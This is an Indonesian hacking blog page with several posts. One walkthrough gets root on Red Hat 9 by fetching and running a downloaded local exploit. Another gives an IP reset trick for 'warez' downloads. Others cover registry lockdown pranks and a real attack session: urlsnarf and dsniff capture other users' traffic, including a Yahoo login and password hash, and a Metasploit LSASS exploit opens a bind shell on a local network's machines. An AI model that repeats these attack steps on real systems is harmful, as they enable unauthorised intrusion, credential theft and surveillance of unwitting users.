Jumat, 06 Februari 2009

Cara Merebut ROOT dengan menggunakan local exploit evie

. Jumat, 06 Februari 2009
0 komentar

Sebenernya banyak cara yang dapet dilakukan bagi kita yang mempunyai shell user biasa untuk
mendapatkan root shell yaitu dengan menggunakan local exploit..
Dewasa ini telah banyak muncul local exploit yang beredar.. Namun yang akan kita bahas adalah
*evie*.. local exploit ini telah penulis buktikan ke*Saktian* nya pada

RH9 yang penulis lupa
Rh9 tersebut menggunakan kernel apa...

Ujicoba telah Penulis lakukan di PC kawan yang menggunakan Rh9 dan di beberapa server yang
menggunakan Rh9... Local exploit ini cukup terbukti ke*Saktiannya*. untuk menanggulanginya..
para System Admin server sebaiknya menggunakan kernel terbaru di server mereka dan lebih jeli
lagi dalam menjaga server mereka dari orang-orang yang tidak bertanggung jawab (kecuali saya loo!!)

Baiklah tanpa harus menunda lagi.... kita mulai!!!!
(masuk keserver anda/ shell anda)

login as: bos
bos@darmajaya.com password :
lastlogin 01 january 2005 from 203.130.235.89
You Have Mail
bos@darmajaya/ $ id;
id;
uid=500(bos) gid=500(bos) euid=500(bos) groups=500(bos) <=- User shell sebelum Menjadi root

bos@darmajaya/ $ wget bocahedan.com/download/evie <=- mendownload file evie

bos@darmajaya/ $ chmod 755 evie <=- memberikan permission pada evie

chmod 755 evie
bos@darmajaya/ $ ./evie <=- Menjalan kan evie
./evie
bash# id; <=- Telah terjadi perubahan (tidak semua-
uid=0(root) gid=0(root) euid=0(root) groups=0(root) shell mengalami perubahan seperti itu)
bash# su
su
root@darmajaya/ $ uname -a
Linux 2.2.3 darmajaya.com #1 Thu Jan 01 07:31:07 EDT 2005 i586 unknown
root@darmajaya/ $
root@darmajaya/ $ id; <=- selamat anda telah menjadi ROOT
id;
uid=0(root) gid=0(root) euid=0(root) groups=0(root)
root@darmajaya/ $


demikianlah tulisan saya kali ini... semoga bermanfaat bagi rekan2 semua :P~

Klik disini untuk melanjutkan »»

Get a new IP

.
0 komentar

Get a new IP Address even if you have a Static IP
Yes, it is possible. Try it, it works for a lot of people, even people with cable modems.

1. Open up the command prompt by pressing Start->Run and typing in cmd

2. In the command prompt, type "Ipconfig/all". This will tell you your current IP Address. After, type "ipconfig/release". Keep the command prompt open for easy access.

3. Go to "Network Connections" (accessible through the control panel). Right click "Local Area Connection" and click "Properties"

4. With "Internet Protocol (TCP/IP) selected, click the "Properties" button.

5. A new window will open. Under the "General" tab, select "Use the Following IP address". Under "Ip Address", put "10.0.0.1". Press the "Tab" key on your keyboard.

6. Press Ok on both open windows.

7. Repeat steps 3-4. Under the "General" tab, press the radio button "Automatically Assign Me an Ip Address". Press ok on both windows.

8. Go back to the command prompt and type in "Ipconfig/all". You'll now notice you have a new IP address.

VOILA! Hello unlimited Rapidshare downloads. +1 for the warez community.

Klik disini untuk melanjutkan »»

Belajar Registry

.
0 komentar

Belajar Registry Bag I

Mungkin sudah banyak artikel yg memuat tentang registry windows. Disini penulis akan memulai dari awal, sebelum kita ketemu dengan Belajar Registry Bag II yang akan memuat program instant untuk implementasi perubahan yang akan dilakukan pada registry serta pembahasan program tersebut.OK
Kita mulai dari awal yaitu hal yg paling menjemukan yaitu teori......



Registry merupakan kumpulan dari data windows yang dipakai untuk mengatur jalannya sistem operasi windows. Untuk melakukan perubahan pada windows menggunakan program regedit. Caranya RUN lalu ketik regedit. Akan terlihat 6 root keys yang mempunyai tugas yang berbeda setiap key (mungkin tidak perlu dijelaskan satu persatu biar gak bosen bacanya, setuju?). Klo gak dijelasin gak belajar namanya he...he...
Penjelasan singkat keenam root keys :
1. HKEY_CLASSES_ROOT menangani semua jenis file yang ada di windows
dan menyimpan setting software
2. HKEY_USER menangani semua informasi user yang aktif serta menangani setting control panel pada sistem operasi windows
3. HKEY_CURRENT_USER menangani satu informasi user yang aktif pada
sistem operasi windows.
4. HKEY_LOCAL_MACHINE memuat informasi tentang hardware yang
dipakai pada komputer tersebut.
5. HKEY_CURRENT_CONFIG untuk mencatat konfigurasi sistem yang ada.
6. HKEY_DYN_DATA untuk mengetahui tingkat kinerja suatu sistem dan dalam jaringan.

Dengan begitu banyaknya manipulasi yang bisa dibuat di registry ini, penulis hanya akan menunjukkan beberapa manipulasi yg mudah dibuat, yang beberapa akan penulis implementasikan dalam bentuk program.
1. Mematikan fasilitas display properties (display settings muncul apabila, klik disembarang desktop pilih properties).untuk melakukan penguncian cari root keys brk :
¨HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\ system
¨Buat value baru dengan jenis data DWORD yaitu : NodispCpl (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1
Untuk melihat hasil manipulasi yg dibuat , klik disembarang desktop pilih properties.

2. Mematikan program regedit
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ system
¨ Buat value baru dengan jenis data DWORD yaitu : disableregistrytools (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1

3. Menghilangkan fasilitas RUN
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ explorer
¨ Buat value baru dengan jenis data DWORD yaitu : NoRun (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1
4. Menghilangkan Fasilitas Find
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ explorer
¨ Buat value baru dengan jenis data DWORD yaitu : NoFind (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1

5. Menghilangkan Fasilitas Shutdown
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ explorer
¨ Buat value baru dengan jenis data DWORD yaitu : Noclose (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1
6. Mematikan pilihan SaveAs pada internet explorer
¨ HKEY_CURRENT_USER\software\microsoft\internetexplorer\restrictions
¨ Buat value baru dengan jenis data DWORD yaitu : NoBrowserSaveAs (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1
7. Menghilangkan pilihan Log off
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ explorer
¨ Buat value baru dengan jenis data DWORD yaitu : NoLogOff (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1

8 Menghilangkan Pilihan FILE pada windows explorer
¨ HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\ explorer
¨ Buat value baru dengan jenis data DWORD yaitu : Nofilemenu (caranya klik kanan pada bagian kanan program regedit)
¨ Klik 2 kali value baru yg kita buat, isikan nilai 1

Untuk menormalkan semua perubahan yang dibuat tinggal mengganti nilai 1 menjadi nilai 0

Semua perubahan yang dibuat diatas sudah penulis uji coba dan 100% berhasil. Penulis menggunakan windows 98 sebagai contoh. Untuk implementasi program akan dimuat pada Belajar Registry Bag II. Mudah2an temen2 yg baru belajar registry seperti saya ini dapat memanfaatkannya sebagai pembelajaran. Buat semua BALIHACK CREW maju terus

Sekarang kita lanjutkan belajar registry. Seperti yg telah saya janjikan artikel ini merupakan kelanjutan dari artikel Berkenalan dengan Registry Bag I yang isinya yaitu implementasi dlm bentuk program. Jadi kita kagak usah buka registry secara manual yg tentu sangat membosankan dan males seperti saya.

Program ini dibuat oleh SPC (semarapura punk crew), krn pas aku maen kekost dia n ngobrol tentang registry ternyata dia jg punya niat buat bikin program pengubah registry jd kenapa hrs pusing klo udah ada yg mau mengerjakannya.sekarang kita bahas beberapa perubahan yg ditambah pada program ini....

1. menghilangkan tab remote administration
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoAdminPage"
Tipe data "DWORD"

2. menghilangkan tab user profile
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoProfilePage"
Tipe data "DWORD"

3. menghilangkan tab change password
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoPwdPage"
Tipe data "DWORD"

4. Deactive ADD Printer
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\explorer"
Value "NoAddprinter"
Tipe data "DWORD"

5. Deactive delete Printer
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\explorer"
Value "Nodeleteprinter"
Tipe data "REG_DWORD"

6. Deactive tab general and detail printer
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\explorer"
Value "Noprintertabs"
Tipe data "DWORD"

7. hide tab Hardware Profile
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoConfigPage"
Tipe data "DWORD"

8. hide tab device manager
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoDevMgrPage"
Tipe data "DWORD"

9. hide button file system
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoFilesysPage. "
Tipe data "DWORD"

10. hide button Virtual Memory
Key "hkey_current_user\software\microsoft\windows\currentversion\policies\system"
Value "NoVirtMemPage"
Tipe data "REG_DWORD"

Wah...segini aja,takut artikel kepanjangan dan membosankan bagi yg males baca seperti saya. Msh banyak hal yg didalam program yg belum dibahas pd kesempatan ini. mohon jangan marah...
OK...sekarang kita lihat beberapa baris script tools ini, yg menggunakan delphi....


procedure TForm1.CheckBox7Click(Sender: TObject);
begin
try
if checkbox7.Checked=true then
begin
spcReg:=TRegistry.Create;
spcReg.RootKey := HKEY_CURRENT_USER;
spcReg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\',false);
spcReg.WriteInteger('NoRun',1);
end
else if checkbox7.Checked=false then
begin
spcReg:=TRegistry.Create;
spcReg.RootKey := HKEY_CURRENT_USER;
spcReg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\',false);
spcReg.DeleteValue('NoRun');
end;
finally
spcReg.Free;
end;
end;

dari situ dapat kita lihat bahwa apabila kita memilih/check pilihan HIDE RUN, maka program akan memanggil key "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" dan akan membuat value baru dengan nama "NoRun" dan diberi nilai 1. Apabila HIDE RUN di centang lg, maka value NoRun akan dihapus. sehingga akan normal kembali.

apabila perubahan tidak dpt dilihat secara langsung, maka komputer harus direstart. program ini hanya berlaku untuk Win 9x. untuk windows ME,NT, dan XP hanya memungkin beberapa perubahan dikarenakan konfigurasi yg dipakai berbeda dari win 9x.
anda dapat download program ini di

www14.brinkster.com/putu4niki/regeditspc.zip

program ini dpt disimpan di disket,jd klo kemana mana bawa tools ini untuk mengerjai teman anda yg sombong ato ngerjai warnet (tp sayang kebanyakan warnet pake deep frezee)...he..he...cuma becanda....

Klik disini untuk melanjutkan »»

Grabbing URL, Sniffing, dan Remote Exploit

.
0 komentar

Auditor security merupakan sebuah system operasi yang bersifat live-system berbasiskan pada knopix.

Menurut penciptanya yang dituliskan pada http://remote-exploit.org , linux Auditor Security diciptakan untuk
memenuhi kebutuhan para excellent-user yang dikombinasikan dengan toolset yang optimal serta penggunakan
yang user friendly. Program – program open source pada auditor security menawarkan toolset yang komplit
untuk meng-analysis keamanan sebuah system, byte per byte.

Dalam tulisan ini akan dibahas sebagian dari security tool set yang terdapat pada linux Auditor Security.

A. Grabbing URL
Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi oleh seseorang tanpa ataupun sepengetahuan
dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu channel IRC dan pada jaringan lokal yang
terhubung dengan internet.

1. Grabbing URL pada channel IRC
Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan menggunkan XCHAT yang telah tersedia secara bult-in
pada linux auditor. Langkah pertama tentu saja kita harus join ke channel tertentu. Setelah join ke channel tertentu
langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa saat, maka jika ada salah satu user yang
tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan bertambah.
Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet, #skb50, #indonona, #echo, #k-elektronik, #bandung
pada server dalnet tanggal 1 September 2005.

ftp.orghttp://echo.or.id
http://irc.jraxis.com/dalnet/default/
http://kline.dal.net/exploits/akills.htm#ma
http://kline.dal.net/exploits/akills.htm#ma)))
http://kline.dal.net/massads/mup.htm
http://kline.dal.net/proxy/
http://miranda-im.org
http://tiongkokmusic.com:2222/listen.pls
http://unut.hollosite.com
http://valueshells.com
http://valueshells.com/disc.html
http://www.dal.net/
http://www.dal.net/aup/
http://www.equinix.net
http://www.kecoak.or.id
http://www.malanghack.net/
http://www.rayofshadow.or.id
http://www.valueshells.com
irc.hackerszone.orgirc.vsnl.com
www.balihack.or.idwww.bandung-dal.net
WwW.BaNdUnG.tKwww.dal.net/proxies
www.jraxis.comwww.malanghack.net
WwW.PsYcHoPeD.InFowww.scoopsite.com
www.superask.netwww.VALUESHELLS.com
www.ValueShells.comwww.valueshells.com
www.valueshells.comwww.w0nk.org
www.zone-h.org/en/defacements/mirror/id=2840693/>
www.zone-h.org/en/defacements/mirror/id=2840696/>

Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter pada channel – channel diatas.
Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL yang dikunjungi tiap chatter.


2. Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet

Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan grabbing URL pada jaringan lokal yang terhubung
pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk menjalankan URL Snarf ketikan perintah berikut
pada konsole :

hyraxz@chidori~dove# urlsnarf -i eth0 > ./grabMeBabe.txt

Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah tinggal tidur dan membuka hasil grabbing
keesokan hari.Berikut ini satu baris potongan dari hasil grabbing URL yang berhasil penulis capture, penulis hanya
menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam 00:15:37 sampai 06:21:10 pada
tanggal 02/Sep/2005.

192.168.10.5 - - [02/Sep/2005:05:38:37 -0400] "GET http://www.friendster.com/friendrequests.php?lastact=approve&sc=933
HTTP/1.1" - - "http://www.friendster.com/friendrequests.php?statpos=homealerts" "Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)"

Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa komputer dengan IP 192.168.10.5
pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang mengakses www.friendster.com dan kemungkinan
besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan browser dari user tersebut adalah
Mozzila/5.0 dengan mamakai sistem operasi linux.


B. Sniffing Menggunakan DSNIFF

Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi tertentu dalam suatu network dangan jalan
meng-capture paket – paket data yang ada pada suatu network dan kemudian menganalisinya untuk diambil informasinya
yang dianggap penting. Dsiniff merupakan suatu tool sniffing yang telah tersedia pada linux auditor security.
Untuk memulai sniffing ketikan perintah berikut ini:

hyraxz@chidori~dove# dsniff –i eth0 –W /mnt/hda5/passwd_HhAN.db

perintah diatas akan memerintahkan dsniff untuk meng-capture paket - paket yang melintasi eth0 dan menuliskan hasilnya
pada sebuah file dengan nama passwd_HhAN.db yang disimpan pada directory /mnt/hda5/.
Untuk membaca hasilnya gunakan perintah berikut ini:

hyraxz@chidori~ dove# dsniff -r /mnt/hda5/passwd_HhAN.db

Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut bisa dibuka menggunakan notepad saat di Windows,
ketik perintah berikut :

hyraxz@chidori~dove# dsniff -r /mnt/hda5/passwd_HhAN.db > /mnt/hda5/GetDownEnemy.txt

Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis documentasikan :

09/02/05 04:58:42 tcp 192.168.10.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET
/reg/login1/newym_nouc/lisu/login/us/ym/*http://login.yahoo.com/config/login?.tries=1&.src=ym&.md5=&.hash=&.js=1&.
last=&promo=&.intl=us&.bypass=&.partner=&.u=b261flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy0vhTsQz0&.yplus=&.
emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A//mail.yahoo.com&login=rip_zombie
&passwd=ace61b359fa543aceccf111dbd767e74&.persistent=&.hash=1&.md5=1 HTTP/1.1Host: us.rd.yahoo.com

Berikut analysis dari hasil sniffing di atas:
1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing dilakukan pada koneksi TCP antara host dengan
IP 192.168.10.7:1183 dengan server yahoo pada p2.rd.scd.yahoo.com:80 denagan memakai protokol HTTP.
2. User Name untuk login ke server e-mail dari user tersebut adalah rip_zombie dengan password hasil enkripsi
MD5 “ace61b359fa543aceccf111dbd767e74” (tanpa tanda petik).
3. Server mail yahoo menggunakan methode enkripsi MD5.



C. Remote Exploit

Remote exploit adalah suatu program yang dijalankan pada computer attacker, digunakan untuk menginjeksi komputer target
sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa ataupun sepengetahuan dari korban.
Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit.
Menyusup di Jaringan SKB50 Menggunakan Metasploit
Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai dengan IP dari jaringan SKB50. berikut ini
konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi IP pada jaringan SKB50.

hyraxz@chidori~dove# ifconfig –eth0 192.168.0.10 netmask 255.255.255.0
hyraxz@chidori~dove# ifconfig
eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:712 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b)
Interrupt:5 Base address:0x9800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:500 (500.0 b) TX bytes:500 (500.0 b)

Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit :

hyraxz@chidori~dove# cd /opt/auditor/metasploit
hyraxz@chidori~dove# ./msfconsole

jika berhasil maka akan muncul tulisan seperti berikut ini :


888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
+ -- --=[ msfconsole v2.4 [75 exploits - 75 payloads]
msf >

untuk memulai penggunakanya ketikan perintah-perintah dibawah ini:

msf > show exploits
Metasploit Framework Loaded Exploits
====================================
3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits

afp_loginext
aim_goaway

apache_chunked_win32
arkeia_agent_access

arkeia_type77_macos
arkeia_type77_win32

backupexec_ns
bakbone_netvault_heap

blackice_pam_icq
cabrightstor_disco

cabrightstor_disco_servicepc
cabrightstor_uniagent

calicclnt_getconfig
calicserv_getconfig

distcc_exec
exchange2000_xexch50

globalscapeftp_user_input
ia_webmail

icecast_header
iis40_htr

iis50_printer_overflow
iis50_webdav_ntdll

iis_fp30reg_chunked
iis_nsiislog_post

iis_source_dumper
iis_w3who_overflow

imail_imap_delete
imail_ldap

irix_lpsched_exec
lsass_ms04_011

maxdb_webdbm_get_overflow
mercantec_softcart

minishare_get_overflow
msasn1_ms04_007_killbill

msmq_deleteobject_ms05_017
msrpc_dcom_ms03_026

mssql2000_preauthentication
mssql2000_resolution

netterm_netftpd_user_overflow
openview_omniback

oracle9i_xdb_ftp
oracle9i_xdb_ftp_pass

payload_handler
poptop_negative_read

realserver_describe_linux
samba_nttrans

samba_trans2open
samba_trans2open_osx

samba_trans2open_solsparc
sambar6_search_results

seattlelab_mail_55
sentinel_lm7_overflow

servu_mdtm_overflow
smb_sniffer

solaris_dtspcd_noir
solaris_kcms_readfile

solaris_lpd_exec
solaris_sadmind_exec

solaris_snmpxdmid
solaris_ttyprompt

squid_ntlm_authenticate
svnserve_date

trackercam_phparg_overflow
uow_imap4_copy

uow_imap4_lsub
ut2004_secure_linux

ut2004_secure_win32
warftpd_165_pass

warftpd_165_user
webstar_ftp_user

windows_ssl_pct
wins_ms04_045

wsftp_server_503_mkd
Metasploit Framework Credits

AppleFileServer LoginExt PathName Overflow
AOL Instant Messenger goaway Overflow

Apache Win32 Chunked Encoding
Arkeia Backup Client Remote Access

Arkeia Backup Client Type 77 Overflow (Mac OS X)
Arkeia Backup Client Type 77 Overflow (Win32)

Veritas Backup Exec Name Service Overflow
BakBone NetVault Remote Heap Overflow

ISS PAM.dll ICQ Parser Buffer Overflow
CA BrightStor Discovery Service Overflow

CA BrightStor Discovery Service SERVICEPC Overflo
CA BrightStor Universal Agent Overflow

CA License Client GETCONFIG Overflow
CA License Server GETCONFIG Overflow

DistCC Daemon Command Execution
Exchange 2000 MS03-46 Heap Overflow

GlobalSCAPE Secure FTP Server user input overflow
IA WebMail 3.x Buffer Overflow

Icecast (<= 2.0.1) Header Overwrite (win32)
IIS 4.0 .HTR Buffer Overflow

IIS 5.0 Printer Buffer Overflow
IIS 5.0 WebDAV ntdll.dll Overflow

IIS FrontPage fp30reg.dll Chunked Overflow
IIS nsiislog.dll ISAPI POST Overflow

IIS Web Application Source Code Disclosure
IIS w3who.dll ISAPI Overflow

IMail IMAP4D Delete Overflow
IMail LDAP Service Buffer Overflow

Irix lpsched Command Execution
Microsoft LSASS MSO4-011 Overflow

MaxDB WebDBM GET Buffer Overflow
Mercantec SoftCart CGI Overflow

Minishare 1.41 Buffer Overflow
Microsoft ASN.1 Library Bitstring Heap Overflow

Microsoft Message Queueing Service MSO5-017
Microsoft RPC DCOM MSO3-026

MSSQL 2000/MSDE Hello Buffer Overflow
MSSQL 2000/MSDE Resolution Overflow

NetTerm NetFTPD USER Buffer Overflow
HP OpenView Omniback II Command Execution

Oracle 9i XDB FTP UNLOCK Overflow (win32)
Oracle 9i XDB FTP PASS Overflow (win32)

Metasploit Framework Payload Handler
Poptop Negative Read Overflow

RealServer Describe Buffer Overflow
Samba Fragment Reassembly Overflow

Samba trans2open Overflow
Samba trans2open Overflow (Mac OS X)

Samba trans2open Overflow (Solaris SPARC)
Sambar 6 Search Results Buffer Overflow

Seattle Lab Mail 5.5 POP3 Buffer Overflow
SentinelLM UDP Buffer Overflow

Serv-U FTPD MDTM Overflow
SMB Password Capture Service

Solaris dtspcd Heap Overflow
Solaris KCMS Arbitary File Read

Solaris LPD Command Execution
Solaris sadmind Command Execution

Solaris snmpXdmid AddComponent Overflow
Solaris in.telnetd TTYPROMPT Buffer Overflow

Squid NTLM Authenticate Overflow
Subversion Date Svnserve

TrackerCam PHP Argument Buffer Overflow
University of Washington IMAP4 COPY Overflow

University of Washington IMAP4 LSUB Overflow
Unreal Tournament 2004 "secure" Overflow (Linux)

Unreal Tournament 2004 "secure" Overflow (Win32)
War-FTPD 1.65 PASS Overflow

War-FTPD 1.65 USER Overflow
WebSTAR FTP Server USER Overflow

Microsoft SSL PCT MS04-011 Overflow
Microsoft WINS MS04-045 Code Execution

WS-FTP Server 5.03 MKD Overflow

msf > use lsass_ms04_011
msf lsass_ms04_011 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_adduser

win32_bind
win32_bind_dllinject

win32_bind_meterpreter
win32_bind_stg

win32_bind_stg_upexec
win32_bind_vncinject

win32_exec
win32_passivex

win32_passivex_meterpreter
win32_passivex_stg

win32_passivex_vncinject
win32_reverse

win32_reverse_dllinject
win32_reverse_meterpreter

win32_reverse_ord
win32_reverse_ord_vncinject

win32_reverse_stg
win32_reverse_stg_upexec

win32_reverse_vncinject
Windows Execute net user /ADD

Windows Bind Shell
Windows Bind DLL Inject

Windows Bind Meterpreter DLL Inject
Windows Staged Bind Shell

Windows Staged Bind Upload/Execute
Windows Bind VNC Server DLL Inject

Windows Execute Command
Windows PassiveX ActiveX Injection Payload

Windows PassiveX ActiveX Inject Meterpreter Payload
Windows Staged PassiveX Shell

Windows PassiveX ActiveX Inject VNC Server Payload
Windows Reverse Shell

Windows Reverse DLL Inject
Windows Reverse Meterpreter DLL Inject

Windows Staged Reverse Ordinal Shell
Windows Reverse Ordinal VNC Server Inject

Windows Staged Reverse Shell
Windows Staged Reverse Upload/Execute

Windows Reverse VNC Server Inject


msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------------ ------------------
required RHOST 192.168.0.19 The target address
required RPORT 139 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell
Target: Automatic
msf lsass_ms04_011(win32_bind) > exploit
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows XP target (KICKS)
[*] Windows XP may require two attempts
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> netstat -a
netstat -a
Active Connections
Protocol Local Address Foreign Address State
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
UDP

UDP
UDP

UDP
UDP

UDP
UDP

UDP
kicks:epmap

kicks:microsoft-ds
kicks:1025

kicks:1056
kicks:1090

kicks:1095
kicks:1098

kicks:1130
kicks:4444

kicks:5000
kicks:netbios-ssn

kicks:1162
kicks:1169

kicks:4444
kicks:microsoft-ds

kicks:isakmp
kicks:ntp

kicks:1900
kicks:ntp

kicks:netbios-ns
kicks:netbios-dgm

kicks:1900
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

192.168.0.10:1382
*:*

*:*
*:*

*:*
*:*

*:*
*:*

*:*
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

ESTABLISHED

^c
Caught interrupt, exit connection? [y/n]y
msf lsass_ms04_011(win32_bind) >

Analisa dari hasil aktivitas diatas adalah sebagai berikut :
metasploit meng-attack korban melalui port 139 kemudian memasukan payload yang akan membangun hubungan antara korban
dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan dilakukan melalui port 4444 pada sisi korban
dan port 1382 pada sisi attacker.Setelah bind port antara attacker dengan korban terbentuk maka attacker menguasai
sepenuhnya aktifitas dari komputer korban. Dari 12 komputer yang hidup saat analisa dilakukan pada jaringan lokal
SKB50 6 buah komputer mampu di tembus dengan menggunakan metasploit, ini berarti bahwa 50% jaringan SKB50 pada saat
itu ada di tangan attacker ;).


Daftar Pustaka :
Fwerd (Kecoak Elektronik), Memanen Password Di Jaringan Lokal dengan dsniff,
Terbitan Online Kecoak Elektronik http://k-elektronik.co.id.
From Exploit, http://new.remote-exploit.org/index.php/Auditor_main.

Klik disini untuk melanjutkan »»

Hacker & Cracker

.
1 komentar

Pahlawan versus Penjahat



Masih ingat Kevin Mitnick ? Sosok tinggi dan ceking yang pernah menggegerkan dunia cyber itu oleh para hacker di seantero jaringan dianggap sebagai orang nomor satu penjahat jaringan. Bagaimana tidak, disamping telah mencuri data yang bernilai miliaran dollar AS melalui jaringan Internet, dia juga diduga telah menyabot sistem komputer NORA.D (Komando Pertahanan Amerika Utara) yang mengawasi rudal - rudal Rusia dan mengarahkan sistem rudal AS serta pesawat - pesawat pembom AS di seluruh dunia. Seperti yang diberitakan, akhirnya ia berhasil ditangkap setelah diburu selama 3 tahun (1993 - 1995) oleh para agen Federal dan sekelompok pakar komputer dibawah pimpinan pakar fisika komputasi di San Diego Computing Centre, Tsutomu Shomomura.

Setahun kemudian, tepatnya 1996 dinas rahasia AS yang sudah kondang, CIA tak lupu dari serangan para hacker. CIA dipermalukan oleh para hacker itu dengan mengganti singkatan CIA yang terpampang dalam website lembaga rahasia ini sehingga berbunyi "Central Stupidity Agency".

Aktifitas hacker tidak berhenti sampai di situ. Februari 2000 situs - situs besar AS seperti Yahoo!, Amazon.com dan beberapa lainnya mengaku mendapat amukan para hacker. 19 Mei 2000 Senator Partai Republik dari Maine, Susan M. Collins mengisahkan bagaimana identitas dirinya dipalsukan orang lain untuk tujuan - tujuan yang tidak benar di dunia maya, dan data - data itu di duga dicuri para hacker dari jaringan internet. Lebih mengejutkan lagi, Departemen Pertahanan AS, Pentagon, mengaku menerima gangguan hacker 250.000 kali setiap tahunnya.

